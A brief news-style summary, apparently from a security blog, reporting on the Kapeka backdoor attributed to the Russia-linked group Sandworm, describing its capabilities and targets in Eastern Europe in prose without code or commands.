Priya PatelTLDR: Russian APT Deploys New ‘Kapeka’ Backdoor in Eastern European Attacks
Key Points:
- A new backdoor called Kapeka has been observed in cyber attacks targeting Eastern Europe since mid-2022.
- Attributed to the Russia-linked APT group Sandworm, Kapeka is a flexible backdoor with functionalities for data theft, destructive attacks, and remote access.
A previously undocumented backdoor named Kapeka has been sporadically used in cyber attacks targeting Eastern European countries such as Estonia and Ukraine since mid-2022. The malware, attributed to the Russia-linked advanced persistent threat (APT) group known as Sandworm, is a flexible backdoor that serves as an early-stage toolkit for attackers while providing long-term access to compromised systems.
Kapeka includes a dropper that initiates the execution of a backdoor component on the infected host and establishes persistence for continued access. Microsoft has also identified this malware as KnuckleTouch and described it as being involved in various campaigns distributing ransomware and performing actions such as stealing credentials, conducting destructive attacks, and allowing threat actors remote access to infected devices.
The backdoor itself is a Windows DLL written in C++ with an embedded command-and-control (C2) configuration to communicate with a server controlled by the attackers. It can read and write files, launch payloads, execute commands, and update or uninstall itself. The malware utilizes a legitimate binary called certutil to retrieve the dropper from compromised websites, enhancing its stealth and sophistication.
Kapeka shares connections with other malware families associated with Sandworm, such as GreyEnergy and Prestige, suggesting its evolution from previous tools used by the threat actor group. The malware’s victimology, infrequent sightings, and level of sophistication indicate APT-level activity likely of Russian origin.
In conclusion, the emergence of Kapeka highlights the ongoing threat posed by advanced cyber attackers and the importance of robust cybersecurity measures to protect against such sophisticated threats.
